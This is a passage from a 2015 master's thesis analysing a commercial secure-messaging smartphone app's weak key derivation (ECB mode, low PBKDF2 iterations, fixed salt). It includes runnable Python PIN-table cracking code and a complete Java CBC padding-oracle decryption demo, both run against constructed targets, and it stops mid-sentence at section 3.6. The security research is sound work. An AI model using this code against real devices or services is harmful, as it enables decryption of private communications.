Privacy in Hostile Environments
Mafalda Duarte Freitas, Mestrado Integrado em Engenharia de Redes e Sistemas Informáticos, Departamento de Ciências de Computadores
2015
Advisor
Luís Antunes, Associate Professor, FCUP
All corrections required by the jury, and only those, have been made.
The President of the Jury,
Porto, ______/______/_________
Abstract
In recent decades, mobile networks and mobile devices with significant computing power have
grown in popularity and availability. With ubiquitous Internet access, the public now depends on
online services and applications to perform activities that range from everyday social interaction
to the exchange of secure communications of the highest level. Each of these activities has its
own requirements and involves different risks, but they have in common a fundamental challenge:
to exchange private information over a shared communication channel that they cannot control.
In the present work we approach two very different scenarios. In the first scenario, there
is the need to provide secure, encrypted mobile communications to high-visibility government
entities that are likely to be individually targeted. In the second scenario, there is the need to
protect the average Internet user from unwilling exposure to local data interception, privacy
breaches, identity theft or bulk collection of private data.
In the context of secure communications in the first scenario, we closely examine a mobile
application that is currently on the market, with claims that it can provide a secure communication
channel through any set of Android or iOS smartphones. We analyze the application's deployment
and its code, and describe the vulnerabilities found during that analysis, comparing them with
the well-known vulnerabilities of Wi-Fi Protected Access version 1 (WPA1). We develop a
proof-of-concept attack that demonstrates that those vulnerabilities make the application unsuitable
for providing a secure communication channel. We also recommend some steps to improve
the application and to prevent the commercialization of software solutions whose security has not
been tested.
In the second scenario, to address the protection of average Internet users, we start with
a historical analysis of the concept of privacy as a human right. Our goal is to establish the
level of privacy that each individual can rightly aspire to, and what provisions have been made
in the past to preserve that level of privacy. We show that technological development has
constantly been a source of danger to personal privacy and freedoms, and that a constant effort
must be made to counteract that effect. We then review current initiatives to protect citizens
from mass surveillance and bulk data collection, and design our own tool to help the average
user regain control over his or her online experience.
Resumo
In recent decades there has been a growing increase in the availability and popularity of
mobile networks and devices, the latter with ever more significant computing power. With
ubiquitous Internet access, the public increasingly depends on online services and applications
for activities that range from daily social interaction to secure communications of the highest
level. Each of these activities has specific needs and involves different risks, but they have in
common a fundamental challenge: exchanging private information over a shared communication
channel that they cannot control.
In this work we address two very different scenarios. In the first, there is the need to provide
secure, encrypted mobile communications to government entities. These have high visibility and
a high probability of being targeted by attacks. In the second scenario, there is the need to
protect ordinary Internet users from local interception of information, invasion of privacy,
identity theft and bulk collection of private data.
In the context of secure communications, within the first scenario, we examine a mobile
application on the market that claims to provide a secure communication channel between any
pair of Android or iOS smartphones. The application and its code are analyzed, and the
vulnerabilities found during that analysis are described and compared with recognized
vulnerabilities of WPA1. We develop a demonstration attack to show that the vulnerabilities
found make the application unable to provide a secure communication channel. We also
recommend some steps to improve the application and to prevent the commercialization of
software solutions whose security has not been adequately tested.
In the second scenario, to address the protection of the ordinary Internet user, we begin with
a historical analysis of the concept of privacy as a fundamental right. Our goal is to establish
the level of privacy to which each individual may aspire, and what measures were taken in the
past to preserve that level of privacy. We show that technological development has been a
constant source of danger to privacy and individual freedoms, and that a permanent effort is
needed to counteract that effect. We review existing initiatives to protect citizens from
permanent surveillance and bulk data collection, and create our own tool to let the ordinary
citizen regain control over his or her online experience.
Dedication
I dedicate this work to my parents, who I’d choose again if I had another chance at life, to my
sister, my greatest joy, in the hope she grows to a better world, to Hugo, who I met so briefly,
but whose talent and passion still inspire me, and to all the programmers and hackers out there
that work in the shadow so that others can bring their stories to light.
Acknowledgments
First and foremost, I would like to thank my thesis advisor, Luís Antunes, for his guidance,
support and understanding. His dedication made this work possible.
In November 2013, I had the opportunity to join the Centro de Competências em Cibersegurança
e Privacidade, at University of Porto. My time at C3P was an extraordinary experience,
giving me renewed energy and passion for my work. Much of the work presented in this thesis
was made possible by the assistance and expertise provided by my colleagues at C3P, who also
provided me with much needed help and companionship. In particular, I am very grateful to Luís
Maia, Luís Valente, and Pedro Brandão, who gave me precious support, and the right advice
and insights in the right moments.
I am very grateful to Filipa Calvão for her time and support. Her collaboration, together
with the team at Comissão Nacional de Protecção de Dados, was essential to the development
and success of C3Priv, and I truly appreciate the work we did together.
I have to thank both Filipa Calvão and Luís Torgo for making my defense a moment I enjoyed
and will remember fondly. I appreciate their kind words and the positive criticism.
I thank Alexandra Ferreira for her unwavering support, her faith in my abilities, and the
expert navigation through the dangerous seas of academic bureaucracy.
To my friends, Mário, Pedro, Cristiano, Daniel, Patrícia, Ivo, Rui and André, I am thankful for
the late night talks, the hours of fun, my new TF2 skills and for reminding me regularly that
there is a lighter side to life. I am forever grateful to Mário, who dreamed for me when I forgot
how to.
Last, but certainly not least, I thank my parents, Paula and Júlio, and my sister Matilde. I
am deeply grateful for the financial and moral support, for believing in me when I did not, and
for always being near, despite the distance. Your unconditional love and encouragement keep
pushing me forward.
Contents
Abstract
Resumo
1 Introduction
2 App Analysis
  2.1 The Application
  2.2 Vulnerabilities
    2.2.1 Electronic Codebook (ECB) encryption mode
    2.2.2 Number of iterations of the Pseudorandom Function (PRF) in Password-Based Key Derivation Function 2 (PBKDF2)
    2.2.3 Use of a fixed salt
3 Proposed attack
  3.1 Description of WPA
  3.2 Comparison with our software
  3.3 A distributed attack on WPA1
  3.4 Padding Oracle Attack
  3.5 Results
  3.6 Possible improvements
4 Privacy in hostile environments
  4.1 The right to be let alone
  4.2 Mass surveillance
  4.3 Privacy and technology
5 Easy to use Privacy: C3Priv
  5.1 Guiding premises
  5.2 Privacy By Default
  5.3 Recognizing Limits
  5.4 Proposed Solution
  5.5 Advantages of Open Source
  5.6 Selected Applications
  5.7 Selected Browser Add-ons
  5.8 Observations and Results
  5.9 Future
    5.9.1 Creating an indistinguishable online identity
    5.9.2 Surveying users' needs
6 Conclusion
Annex A - Portable Applications
Annex B - Firefox Add-Ons
Acronyms
Bibliography
List of Figures
3.1 Example of PKCS5 padding in blocks containing 3, 5 and 8 byte messages, in blocks of 8 bytes.
3.2 Padding oracle attack on the last byte of an 8 byte block, producing an incorrect padding.
3.3 Padding oracle attack on the last byte of an 8 byte block, producing a correct padding of 0x01.
3.4 Padding oracle attack on the second-last byte of an 8 byte block, producing an incorrect padding.
3.5 Padding oracle attack on the second-last byte of an 8 byte block, producing a correct padding of 0x02.
5.1 PortableApps menu
5.2 Contents of a Universal Serial Bus (USB) pen-drive with C3Priv already installed
5.3 Volume of C3Priv downloads from February 2014 to October 2014
5.4 C3Priv download distribution globally
5.5 C3Priv download distribution in Europe
List of Tables
2.1 List of the files found in the smartphone's Secure Digital (SD) cards
2.2 Specific values that PBKDF2 receives as input
3.1 PBKDF2 Key Derivation in WPA1 and in the analyzed application
Chapter 1
Introduction
In the early days of telephony, circuit-switched connections created a communication channel that
was well defined and exclusive to the participants. This allowed wire telegraph circuits to be used
to establish secure connections between parties that needed to keep their communications secret.
A famous example of such use is the Direct Communications Link between Washington and
Moscow, known as the Washington-Moscow Hotline. This line, established in 1963, was a secure
emergency communications channel between the American and the Soviet governments.
Unlike the more modern packet-based, connectionless networks, the circuit-switched telephone
networks were very linear. There were few telecommunication companies providing telephony
services, and the small number of users allowed them a great level of control over the
infrastructure. The communications usually were not private, but to access them one had to
have physical access to the network. To keep special communication channels private,
direct lines such as the Washington-Moscow Hotline used encryption to ensure that only the
receiving end could obtain the plaintext message, and the lines themselves were deployed in
secret underground tunnels, to stop physical interception.
Initially, the volume of data exchanged through these connections was very small. The
messages were mostly text, and beyond the daily tests, the system was only rarely used. The
one-time tapes used to keep messages encrypted in transit were provided by both sides, and
carried halfway across the world [37]. With the rise of satellite communications, however, and
the falling prices of both communication equipment and telephone data plans, landlines and
circuit-switched networks were replaced by mobile and packet-switched networks, such as the
Internet. Today, the pervasiveness of Global System for Mobile Communications (GSM), Third
Generation (3G) and Fourth Generation (4G) mobile networks, and the availability and low
cost of devices to access them, make them the ideal medium for always-ready communication
channels between any set of terminals, regardless of location.
Rather than relying on the security of the network to protect communications, as was done
with private landlines or even with satellite-based communications, access through these shared
networks relies heavily on the terminal's ability to preserve the secrecy and integrity of the
messages exchanged. With the evolution of mobile phones into PDAs, and later into smartphones, it
became increasingly easy to obtain the processing power needed to build terminals that could rise
to that challenge. But as the complexity of the technology grew, so did the odds of
mistakes or oversights in the design and implementation of protocols and terminal applications.
To gain some insight into the level of security of commercially available solutions for secret
communications through smartphones, we examine an application for secure communication that
is currently on the market. This application was submitted to the Centro de Competências em
Cibersegurança e Privacidade (C3P) of the University of Porto for review, and the work presented
here was performed in coordination with the C3P team. We analyze the application, identify and
study flaws and vulnerabilities, and determine if and how those vulnerabilities may compromise
the application's security. Based on the results of this analysis, we implement an attack as a
proof of concept of the vulnerabilities found.
We will also examine the concept of privacy as it exists today, how it was created and how
it evolved through history. We will take a brief look at the legal protections offered to citizens
and to how they integrate with the enormous technological growth we have faced in the last
decades, trying to reveal its current shortcomings and the consequences of such shortcomings, in
the present and in the near future.
Finally, we will propose, design and implement a tool that aims to offer Internet users a greater
degree of control over their privacy, whether on their own PCs or on the move.
Chapter 2
App Analysis
In the second half of 2013, an application for Android and iOS smartphones built for secure
mobile communication was submitted to C3P for analysis. The C3P team examined the system to
assess the level of security it provided both to the information stored on the smartphone and to
the communications made through it.
For the scope of the present work, the most relevant aspects were the analysis of the files in
the phones' storage and the information obtained by reverse engineering the code. That analysis
is presented in the following sections, and gives a closer look at the integrity and security of
commercially available solutions that are being deployed and used in real-world scenarios.
2.1 The Application
The brief description of the application provided by its creators on their website gives
some insight into its internal workings. They describe their product as a system built to allow
secure Short Message Service (SMS) and voice communications through any Android or iOS
smartphone it is installed on, to recipients who use the same application to receive those calls
and SMSs.
The communications done through the app are processed by a server that may be either
privately owned, running on the clients premises, or available “in the cloud”. In the latter case,
the server is rented and kept in the provider company’s facilities, but the client remains the
exclusive user of the system.
On the company's website, as well as in statements made to several local newspapers, it
is stated that the encryption used by the system is RSA [54] with 3072-bit keys and Advanced
Encryption Standard (AES) with 256-bit keys, both presented as "extremely secure". (RSA is a
public-key cryptosystem published in 1978; the name comes from the initials of the surnames of
its creators, Ron Rivest, Adi Shamir and Leonard Adleman.)
We were provided with a pair of Android smartphones with the application already installed,
and their respective Personal Identification Numbers (PINs). The PINs unlocked the phones
and allowed the use of the application.
The first step was to examine the smartphones' SD cards. After connecting each SD card to
a computer, we were able to examine the file system, which contained the files listed in Table 2.1.
The files were copied and kept for later use.
Table 2.1: List of the files found in the smartphones' SD cards
• IV
• Public Key
• Private Key
• Public Server Key
We proceeded with the analysis of the application's source code, written in Java. We found
that the communications made through the application were encrypted using public-key
cryptography (RSA) with the keys found on the SD card. The data stored on the
phone, including the keys and the Initialization Vector (IV), was encrypted with symmetric
cryptography, using AES.
By examining the code, we learned that the key used by AES to encrypt the files was derived
from the application's PIN using PBKDF2, which is specified in Public Key Cryptography
Standard (PKCS) #5 [50]. We also verified that the salt used for PBKDF2 was a fixed string
of six alphabetic characters, declared in plain text inside the code.
The values given to PBKDF2 as input are listed in Table 2.2.
Upon examination, it was established that the IV contained in one of the files is device
dependent, and is generated and saved to the SD card on the application's first run. This IV
was encrypted with AES in ECB mode with PKCS5 padding, as were the remaining files, using
the key derived from the PIN.
Table 2.2: Specific values that PBKDF2 receives as input
  PBKDF2 input parameter                   Value
  PRF                                      HMAC-SHA1 (Hash-based Message Authentication Code with Secure Hash Algorithm 1)
  Master password                          PIN
  Salt value                               fixed string
  Number of iterations of the PRF          1024
  Expected length of the derived key       256 bits
2.2 Vulnerabilities
At first glance, the encryption algorithms used seem adequate, both being internationally
recommended ciphers. However, a closer look shows several choices in their deployment
that were poorly made. Of these choices, the most significant are the
encryption mode selected for AES, the number of iterations of the PRF, and the use of a fixed
salt. As we will show, these choices severely compromise the application's security.
2.2.1 ECB encryption mode
The encryption mode chosen for AES is ECB, which is a weak choice of mode of
operation. ECB's main problem is that all identical blocks of plaintext produce the same
ciphertext when encrypted with the same key. This behavior reveals patterns in the encrypted
data that may result in the loss of confidentiality: an attacker who knows the plaintext of some
blocks can recognize that plaintext wherever the same ciphertext block reappears under that key.
Because every block is deciphered independently of its neighbours, ECB also lets an attacker
cut, reorder or replay individual ciphertext blocks without detection, since nothing ties a block
to its position or to the rest of the message.
2.2.2 Number of iterations of the PRF in PBKDF2
The choice of HMAC-SHA1 as the pseudorandom function for PBKDF2 is still considered
appropriate, despite the shortcomings of SHA1 itself. SHA1 is considered vulnerable to
collision attacks, with known attacks since 2005 and abandonment by US federal agencies and
by companies like Microsoft [44], Mozilla [47] and Google [46]. Since the security of HMAC does
not rest on the collision resistance of its underlying hash, SHA1 can still be used for this purpose.
Nevertheless, the National Institute of Standards and Technology (NIST) policy from 2012
advises the use of SHA256 or SHA3 as a replacement for SHA1 [43].
Regarding the number of iterations of the pseudorandom function in PBKDF2, in 2000 the
PKCS5 standard recommended 1000 iterations. At the time it was already foreseeable that
this number would have to be increased to match the growing computing power of newer
Central Processing Units (CPUs). NIST, in a recommendation from 2010, advised that the
iteration count for PBKDF2 should be "as large as possible, as long as the time required to
generate the key using the entered password is acceptable for the users." The minimum iteration
count is still considered to be 1000, but the document states that "for especially critical keys, (...) an
iteration count of 10,000,000 may be appropriate." [51] 10,000,000 iterations may be excessive in
this case, since the limitations of the smartphone's hardware would make the device unresponsive,
and that would not be acceptable to users. However, an iteration count of 1024 is too low to
effectively delay attacks. The iteration count only multiplies the attacker's cost per guess; with
a PIN space of a few thousand to a few million candidates, even a much higher count would not
by itself make an exhaustive search impractical.
2.2.3 Use of a fixed salt
Of the vulnerabilities found, the most alarming is possibly the use of a fixed salt. In cryptography,
a salt is a piece of random data that is combined with a password, usually by concatenation,
before it is hashed. To avoid storing the password in plain text, only the resulting hash and the
respective salt are kept.
Users often choose short and simple passwords that are easier to remember, but such
passwords offer little security. A salt does not make a weak password strong, since an attacker
who obtains the hash normally obtains the salt as well; what it does is ensure that the same
password yields a different hash for each user or device, so that work spent attacking one hash
cannot be reused against another.
Salts therefore substantially increase the cost of cracking a list of hashes with a dictionary
attack. Without a salt, the attacker can build a pre-computed table of the hashes of all likely
passwords once (or its compressed form, a rainbow table) and look every captured hash up in it.
When a random salt is used, the attacker would have to build such tables for every possible salt,
or start the computation over for each target.
Regarding the choice of a salt, Request For Comments (RFC) 2898 states that, if there
is no need to distinguish different uses of the key, "the salt may be generated at random and
need not be checked for a particular format by the party receiving the salt. It should be at least
eight octets (64 bits) long." [50] The salt used in the application is fixed, not random, and shorter
than the recommended 64 bits, with a length of only 48 bits. Although it is not published, it is
declared in the code shipped with the application, so anyone who decompiles the application
learns it, as we did.
Since we know the salt, we can build a pre-computed table with the derived keys of all
combinations of the salt with the possible PINs, at the same cost as if no salt were used,
effectively defeating its purpose. Furthermore, since the salt is reused on all smartphones running
the application, the same table can be reused to crack the PIN on any other instance, saving
the added computing effort. Recovering the PIN yields the AES key, and with it every file on
the SD card, including the user's RSA private key.
Chapter 3
Proposed attack
As we will see in this section, the vulnerabilities found in the application are enough to plan
an attack. We will show how that attack takes a very similar form to the widely performed
attacks on WPA, and how the software for such an attack can be modified to work on our own
scenario. We will show that using this method, it is possible to recover the application’s PIN in
any smartphone running it, effectively taking control over the communications done through the
smartphone. To start the attack, the only requirement is a copy of the SD card’s files.
3.1 Description of WPA
There are two main modes of WPA:
• WPA Enterprise, which is based on Remote Authentication Dial In User Service (RADIUS)
authentication;
• WPA Personal, which uses a Pre-Shared Key (PSK). WPA PSK has two variants:
– WPA1, based on Temporal Key Integrity Protocol (TKIP);
– WPA2, with Counter Mode Cipher Block Chaining Message Authentication Code
Protocol (CCMP), based on AES.
WPA1, which was deprecated in the 2012 revision of the 802.11 standard, uses a 256-bit key to
encrypt network traffic. This key can be either a string of 64 hex digits, or derived from a
passphrase of 8 to 63 printable American Standard Code for Information Interchange (ASCII)
characters. In the latter case, a derivation function, PBKDF2, is applied to the passphrase to
provide a key of the necessary length. In WPA1, PBKDF2 uses 4096 iterations of HMAC-SHA1
and the network's Service Set Identifier (SSID) as salt.
In theory, due to the huge number of possible combinations of SSIDs and passphrases that can
be used in a network, brute-force or dictionary attacks on WPA1 would be infeasible. However,
empirical observation shows that the SSID of domestic networks is rarely changed from the
default hardware brand or Internet Service Provider (ISP) name, meaning that many domestic
wireless networks share the salt used in the key derivation process. This allows the computation
and reuse of huge pre-computed hash tables that combine possible keys with each of the most
common SSIDs.
Since WPA1 was specified as a temporary replacement for Wired Equivalent Privacy (WEP)
that was compatible with older hardware, this possibility of attack was not taken as a serious
risk. However, WPA1 remained in use for much longer, providing motivation for the creation of
software to simplify WPA1 cracking, and for the publication of very large pre-computed hash
tables for the most common brands and ISPs.
3.2 Comparison with our software
Table 3.1 summarizes the WPA1 key derivation process and compares it to that of the
application under analysis at C3P.
Table 3.1: PBKDF2 Key Derivation in WPA1 and in the analyzed application
  Element                   WPA1                                       Analyzed application
  IV                        Captured in the handshake, encrypted       Stored in a file, encrypted with the
                            with the PSK                               PIN-derived key, using AES
  Key                       Captured on the network                    Stored in a file on the SD card
  Key derivation function   PBKDF2                                     PBKDF2
  Pseudorandom function     HMAC-SHA1                                  HMAC-SHA1
  Master password           Passphrase (PSK)                           PIN
  HMAC-SHA1 salt            Network SSID                               Fixed salt string
  HMAC-SHA1 iterations      4096                                       1024
  Derived key length        256 bit                                    256 bit
The table shows that the two processes have many similarities, which allow us to start from the
attack on WPA1 and adapt it to our application. There are also some small differences, such as
the PIN being shorter than a typical network passphrase, and a fixed string being used as salt
instead of the SSID. Of these differences, however, the only one that is reflected in the code
is the number of PRF iterations, which is four times smaller than in WPA1.
The use of a fixed salt is an advantage for the attacker, since it means that the generated set
of tables can be reused to attack other devices running the same application.
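The following Python script is an added example, not code from the thesis or from the application under analysis. It reproduces the key derivation of Table 2.2 with the standard library's PBKDF2 and makes the points of Sections 2.2.2, 2.2.3 and 3.2 concrete: the work to cover the whole PIN space is the iteration count times the number of candidates (a quarter of WPA-PSK's per guess), and with a fixed salt the table of PIN-to-key pairs is built once and reused against every device, whereas a random per-device salt makes the same table worthless. The salt value, the PIN length and the victim PINs are assumptions made for the demonstration; the application's real six-letter salt is not reproduced. The per-device verification step, which in the real attack is a trial AES-ECB decryption of one SD-card file followed by a padding check, is replaced here by a constructed yes/no check so that the script runs without the application's files.

```python
import hashlib
import hmac
import secrets
import string
from itertools import product

# Parameters from Table 2.2 and Table 3.1.
ITERATIONS = 1024       # the application's PBKDF2 iteration count
WPA_ITERATIONS = 4096   # WPA-PSK, for comparison
KEY_LEN = 32            # 256-bit AES key
# The application's salt is a six-letter string found in its code; the value here
# is an assumption for the example, not the real salt.
FIXED_SALT = b"abcdef"


def derive_key(pin, salt=FIXED_SALT, iterations=ITERATIONS):
    """PBKDF2-HMAC-SHA1 with the parameters of Table 2.2."""
    return hashlib.pbkdf2_hmac("sha1", pin.encode("ascii"), salt, iterations, KEY_LEN)


def hmac_calls(pin_len, iterations):
    """HMAC-SHA1 invocations needed to derive a key for every numeric PIN of pin_len digits."""
    return 10 ** pin_len * iterations


def build_table(pin_len, salt=FIXED_SALT, iterations=ITERATIONS):
    """The expensive step: one PBKDF2 run per candidate PIN. With a fixed salt it is
    paid once, and the resulting table serves against every installation."""
    return {pin: derive_key(pin, salt, iterations)
            for pin in ("".join(d) for d in product(string.digits, repeat=pin_len))}


def recover_pin(table, key_is_correct):
    """Offline attack: walk the precomputed table, applying a cheap per-device test to
    each candidate key. Against the real application, key_is_correct would AES-ECB
    decrypt one SD-card file (e.g. the IV file) with the candidate and report whether
    the result ends in valid PKCS#5 padding."""
    for pin, key in table.items():
        if key_is_correct(key):
            return pin
    return None


def make_device(pin, salt=FIXED_SALT):
    """Constructed stand-in for a victim phone: answers yes/no for a candidate key, as
    the padding check would. The attacker never reads real_key."""
    real_key = derive_key(pin, salt)
    return lambda candidate: hmac.compare_digest(candidate, real_key)


def attack_with_shared_table():
    """Build the 4-digit table once, then attack three constructed devices with it: two
    running the application as shipped (fixed salt) and one patched to use a random
    per-device salt, against which the shared table finds nothing."""
    table = build_table(4)
    devices = {
        "phone A (fixed salt)": make_device("0420"),
        "phone B (fixed salt)": make_device("7391"),
        "phone C (random salt)": make_device("0420", salt=secrets.token_bytes(8)),
    }
    return {name: recover_pin(table, check) for name, check in devices.items()}


if __name__ == "__main__":
    print("HMAC-SHA1 calls to cover all 4-digit PINs, app vs WPA-PSK:",
          hmac_calls(4, ITERATIONS), "vs", hmac_calls(4, WPA_ITERATIONS))
    for name, pin in attack_with_shared_table().items():
        print(f"{name}: {'PIN ' + pin if pin else 'not found with the shared table'}")
```

Running the script builds the four-digit table (10,000 PBKDF2 runs, a few seconds on a laptop) and recovers both fixed-salt victims' PINs from that single table, while the random-salt device stays unrecovered until a new table is built for its salt; that per-target rebuild is exactly the cost the fixed salt removes.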
3.3 A distributed attack on WPA1
coWPAtty [57] is a program that performs offline dictionary attacks against WPA/WPA2
networks that use PSK-based authentication, which is the case with WPA Personal. coWPAtty's
attack can be accelerated if pre-computed Pairwise Master Key (PMK) hashes for the target
SSID are provided. These can be produced using genpmk, a tool included with the
software.
genpmk takes as input a password dictionary, salts each password with the desired SSID,
and generates a file with the hashes of the salted passwords. These hashes can then be provided
to coWPAtty together with the SSID of the target network and a file containing a capture of
the four-way TKIP handshake between one client and the Access Point (AP).
In 2011, a group of students from the University of Colorado published an adapted version of
coWPAtty that could speed up the attack on WPA1 by using several nodes to perform distributed
look-ups on rainbow tables.[55] They wrote a Java web application to be run on the master
node that handled the job submission process and the job queue. This master node was also
responsible for starting the worker nodes in the cluster via Secure Shell (SSH), and by dividing
the work equally among them.
Due to the similarities between the attacks, and the significant speed-up obtained with distributed
lookups, we opted to study and adapt this software to develop our own program to exploit
the smartphones' vulnerabilities. Besides the changes needed to adapt the software to our
different use of PBKDF2, our worker nodes did not need to perform much of the work
that coWPAtty did, such as processing the capture files and the four-way handshake. We also
needed our program to perform an additional test, to determine which of the table
entries corresponded to the correct PIN.
After a close examination of the code of the distributed version of the attack, and given the
differences between coWPAtty's requirements and our own, we concluded that the best approach
would be to write new software for the worker nodes. This would allow us to
create cleaner software, easier to debug and fitting our objectives more tightly. However,
due to lack of experience working with web applications and the JBoss web application server,
especially given the additional difficulties of working with distributed computation nodes, the
new version of the application took more than the expected time to develop and presented an
excessive number of bugs. To address these issues, we eventually decided not to develop a
distributed program, and focused instead on obtaining a non-distributed program, only loosely
based on the original distributed code. This last version was still controlled remotely by another
node that offered a web service to start, stop and monitor the worker node.
3.4 Padding Oracle Attack
In cryptography, a padding oracle attack is an attack on the padding of messages encrypted
with a block cipher. The attack is only possible if the receiver, when it fails to decrypt a
message because the padding is incorrect, discloses that fact. When this happens, an attacker
can gain information about the plaintext by modifying the message and asking the oracle to
decrypt it. A successful attack decrypts the message without knowing the encryption key.
The application under analysis uses the Java Cipher class [2] with the AES/ECB/PKCS5Padding
transformation. PKCS5 padding is defined in PKCS #5 [50]: to pad a message, this method
appends the n bytes required to fill the block, each one containing the value n (Java's
"PKCS5Padding" applies this scheme to the 16-byte AES block, which strictly speaking is the
PKCS #7 generalisation of it). An example of this type of padding for 8-byte blocks can be seen
in Figure 3.1. With this type of padding, when the size of the message is a multiple of the block
size, an extra block is appended, filled entirely with padding.
AES is a block cipher, and the application uses the PKCS5 padding that this attack targets.
Note, however, that the byte-by-byte recovery described below depends on the chaining of CBC
mode, in which the attacker controls the plaintext of a block by altering the ciphertext block that
precedes it. In ECB mode each block is deciphered independently, so altering a ciphertext block
only replaces its plaintext with an unrelated value, and the oracle can only confirm whether a
given ciphertext block, placed last, decrypts to valid padding. The doFinal() method provided
by the Cipher class is suitable for building an oracle, since it throws a specific exception (a
BadPaddingException) when the decrypted data does not end in valid padding.
public final int doFinal(byte[] input,
                         int inputOffset,
                         int inputLen,
                         byte[] output,
                         int outputOffset)
    throws ShortBufferException,
           IllegalBlockSizeException,
           BadPaddingException
Listing 3.1: The Java Cipher class method doFinal(). The BadPaddingException thrown by the
method is what enables the padding oracle attack.
This is the case of the ECB cipher mode used in our application, which requires the padded
message to have a length that is a multiple of 16 bytes. The message can be altered and sent to
the oracle, and the oracle replies saying whether the message is well formed, that is, whether the
decrypted data ends in a valid padding. In the classic form of the attack, against CBC mode, the
attacker exploits the chaining between blocks: flipping a bit in the preceding ciphertext block (or
in the IV) flips the same bit in the decrypted block, so the last byte of the forged block can be
adjusted until the oracle accepts a padding of 0x01, then the last two bytes until it accepts 0x02
0x02, and so on, until the whole block, and then the whole message, has been decrypted without
ever knowing the encryption key. Figures 3.2, 3.3, 3.4 and 3.5 show the recovery of the last two
bytes of a block in this way; the process is repeated until the entire message is decrypted. In ECB
mode there is no chaining, so changing a ciphertext byte scrambles the whole decrypted block
instead of flipping a chosen plaintext bit, and the oracle cannot be used to recover the plaintext
byte by byte. What it still gives the attacker is a reliable yes/no test for a candidate key: under
a wrong key, the decrypted last block ends in a valid padding only about once in 256 attempts,
and it is this test that the attack in Section 3.5 relies on.
Figure 3.1: Example of PKCS5 Padding in blocks containing 3, 5 and 8 byte messages, in blocks
of 8 bytes.
Figure 3.2: Padding oracle attack on the last byte of an 8 byte block, producing an incorrect
padding.
Figure 3.3: Padding oracle attack on the last byte of an 8 byte block, producing a correct padding
of 0x01.
Figure 3.4: Padding oracle attack on the second-last byte of an 8 byte block, producing an
incorrect padding.
Figure 3.5: Padding oracle attack on the second-last byte of an 8 byte block, producing a correct
padding of 0x02.
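The byte-by-byte procedure of Figures 3.2 to 3.5, written out in Java as an added example; this is neither the application's code nor the attack software developed for this thesis. It assumes the classic CBC setting, in which the attacker can replace the IV (or the block preceding the target block). The key, the message and the receiver are constructed for the demonstration, and the receiver is reduced to the single bit that doFinal() leaks through BadPaddingException.

```java
import java.nio.charset.StandardCharsets;
import java.security.SecureRandom;
import java.util.Arrays;
import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

// Added example: a CBC padding oracle attack driven by BadPaddingException.
// KEY is constructed for the demo; only the oracle ever uses it, the attacker never reads it.
public class CbcPaddingOracleDemo {
    private static final int BLOCK = 16;
    private static final SecretKeySpec KEY = new SecretKeySpec(new byte[BLOCK], "AES");

    // The receiver, reduced to the one bit it leaks: did the decrypted data end in valid padding?
    static boolean oracle(byte[] iv, byte[] oneBlock) throws Exception {
        Cipher c = Cipher.getInstance("AES/CBC/PKCS5Padding");
        c.init(Cipher.DECRYPT_MODE, KEY, new IvParameterSpec(iv));
        try {
            c.doFinal(oneBlock);
            return true;
        } catch (BadPaddingException e) {
            return false;
        }
    }

    // Recovers the plaintext of ciphertext block c given the block that precedes it (prev, which is
    // the IV for the first block). The attacker submits c on its own with a forged IV, so the receiver
    // computes P' = D_K(c) XOR forged; each accepted padding value reveals one byte of D_K(c).
    static byte[] decryptBlock(byte[] prev, byte[] c) throws Exception {
        byte[] inter = new byte[BLOCK];     // D_K(c), learned from the last byte backwards
        byte[] forged = new byte[BLOCK];
        for (int i = BLOCK - 1; i >= 0; i--) {
            int pad = BLOCK - i;            // padding value wanted at positions i..15
            for (int j = i + 1; j < BLOCK; j++) forged[j] = (byte) (inter[j] ^ pad);
            boolean found = false;
            for (int g = 0; g < 256 && !found; g++) {
                forged[i] = (byte) g;
                if (!oracle(forged, c)) continue;
                if (i == BLOCK - 1) {
                    // A hit on the last byte could be a longer padding (0x02 0x02, ...) by chance:
                    // disturb the byte before it and require the oracle to still accept.
                    forged[i - 1] ^= 0x01;
                    boolean stillValid = oracle(forged, c);
                    forged[i - 1] ^= 0x01;
                    if (!stillValid) continue;
                }
                inter[i] = (byte) (g ^ pad);
                found = true;
            }
            if (!found) throw new IllegalStateException("oracle never accepted byte " + i);
        }
        byte[] plain = new byte[BLOCK];
        for (int i = 0; i < BLOCK; i++) plain[i] = (byte) (inter[i] ^ prev[i]);
        return plain;
    }

    public static void main(String[] args) throws Exception {
        byte[] iv = new byte[BLOCK];
        new SecureRandom().nextBytes(iv);
        Cipher enc = Cipher.getInstance("AES/CBC/PKCS5Padding");
        enc.init(Cipher.ENCRYPT_MODE, KEY, new IvParameterSpec(iv));
        // Constructed message: 28 bytes, so two blocks with four bytes of 0x04 padding.
        byte[] ct = enc.doFinal("Meet at the embassy at 0600.".getBytes(StandardCharsets.US_ASCII));

        // Walk the ciphertext block by block; the IV and the ciphertext are all the attacker sees.
        byte[] recovered = new byte[ct.length];
        for (int b = 0; b < ct.length / BLOCK; b++) {
            byte[] prev = b == 0 ? iv : Arrays.copyOfRange(ct, (b - 1) * BLOCK, b * BLOCK);
            byte[] block = Arrays.copyOfRange(ct, b * BLOCK, (b + 1) * BLOCK);
            System.arraycopy(decryptBlock(prev, block), 0, recovered, b * BLOCK, BLOCK);
        }
        int padLen = recovered[recovered.length - 1] & 0xff;
        System.out.println(new String(recovered, 0, recovered.length - padLen, StandardCharsets.US_ASCII));
    }
}
```

Each block costs at most 256 oracle queries per byte, about 4 000 for a 16-byte block, and the attacker learns the whole message without ever touching the key. The extra check on the last byte matters in practice: when the byte before it happens to decrypt to 0x02, the oracle accepts a guess that yields 0x02 0x02 rather than 0x01, and without the check the recovered intermediate value would be wrong.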
3.5 Results
In order to crack the application's PIN, we attempted to decrypt the IVs found on the SD
card with each of the keys present in our pre-generated rainbow tables. To verify whether a
key succeeded, we caught the Java exceptions thrown by the doFinal() method shown in
Listing 3.1. Whenever a key fails to decrypt the IVs to a valid padding, the method throws a
BadPaddingException, meaning that it was provided with the wrong key. The converse does not
hold: a wrong key produces a valid padding by chance roughly once in 256 attempts, so a candidate
that passes the check still has to be confirmed against the remaining encrypted IVs, which is the
additional test mentioned above.
The delay introduced by development difficulties and by the necessary adaptations to the
existing code resulted in insufficient time to complete the program. Therefore, the application
built has some stability issues and produces unreliable results. However, the test runs performed
showed that the attack could be carried out with success, and we were able to recover the PINs
and to successfully gain full access to the application, demonstrating that the application was
unsuitable to provide a secure communication channel.
3.6 Possible improvements
To increase the security of the application, we suggest a larger iteration count for the PBKDF2
